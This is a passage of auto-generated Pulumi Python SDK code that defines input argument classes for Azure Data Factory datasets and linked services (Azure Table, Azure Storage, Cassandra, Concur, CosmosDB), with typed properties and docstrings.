"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the Azure SQL database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureStorageLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
sas_uri: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None):
"""
The storage account linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: The connection string. It is mutually exclusive with sasUri property. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] sas_uri: SAS URI of the Azure Storage resource. It is mutually exclusive with connectionString property.
"""
pulumi.set(__self__, "type", 'AzureStorage')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if sas_uri is not None:
pulumi.set(__self__, "sas_uri", sas_uri)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
The connection string. It is mutually exclusive with sasUri property. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="sasUri")
def sas_uri(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
SAS URI of the Azure Storage resource. It is mutually exclusive with connectionString property.
"""
return pulumi.get(self, "sas_uri")
@sas_uri.setter
def sas_uri(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "sas_uri", value)
@pulumi.input_type
class AzureTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Azure Table storage dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the Azure Table storage. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'AzureTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the Azure Table storage. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class CassandraLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
username: Optional[Any] = None):
"""
Linked service for Cassandra data source.
:param Any host: Host name for connection. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param Any authentication_type: AuthenticationType to be used for connection. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any port: The port for the connection. Type: integer (or Expression with resultType integer).
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Cassandra')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def host(self) -> Any:
"""
Host name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[Any]:
"""
AuthenticationType to be used for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[Any]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The port for the connection. Type: integer (or Expression with resultType integer).
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class CassandraTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
keyspace: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None,
table_name: Optional[Any] = None):
"""
The Cassandra database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param Any keyspace: The keyspace of the Cassandra database. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any table_name: The table name of the Cassandra database. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'CassandraTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if keyspace is not None:
pulumi.set(__self__, "keyspace", keyspace)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if table_name is not None:
pulumi.set(__self__, "table_name", table_name)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def keyspace(self) -> Optional[Any]:
"""
The keyspace of the Cassandra database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "keyspace")
@keyspace.setter
def keyspace(self, value: Optional[Any]):
pulumi.set(self, "keyspace", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Optional[Any]:
"""
The table name of the Cassandra database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Optional[Any]):
pulumi.set(self, "table_name", value)
@pulumi.input_type
class ConcurLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
type: pulumi.Input[str],
username: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Concur Service linked service.
:param Any client_id: Application client_id supplied by Concur App Management.
:param pulumi.Input[str] type: Type of linked service.
:param Any username: The user name that you use to access Concur Service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name that you provided in the username field.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "type", 'Concur')
pulumi.set(__self__, "username", username)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
Application client_id supplied by Concur App Management.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
The user name that you use to access Concur Service.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name that you provided in the username field.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class ConcurObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Concur Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ConcurObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ControlActivityArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
type: pulumi.Input[str],
depends_on: Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]] = None,
description: Optional[pulumi.Input[str]] = None):
"""
Base class for all control activities like IfCondition, ForEach , Until.
:param pulumi.Input[str] name: Activity name.
:param pulumi.Input[str] type: Type of activity.
:param pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]] depends_on: Activity depends on condition.
:param pulumi.Input[str] description: Activity description.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", 'Container')
if depends_on is not None:
pulumi.set(__self__, "depends_on", depends_on)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Activity name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of activity.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="dependsOn")
def depends_on(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]]:
"""
Activity depends on condition.
"""
return pulumi.get(self, "depends_on")
@depends_on.setter
def depends_on(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ActivityDependencyArgs']]]]):
pulumi.set(self, "depends_on", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Activity description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class CosmosDbLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Microsoft Azure Cosmos Database (CosmosDB) linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'CosmosDb')
if annotations is not None:
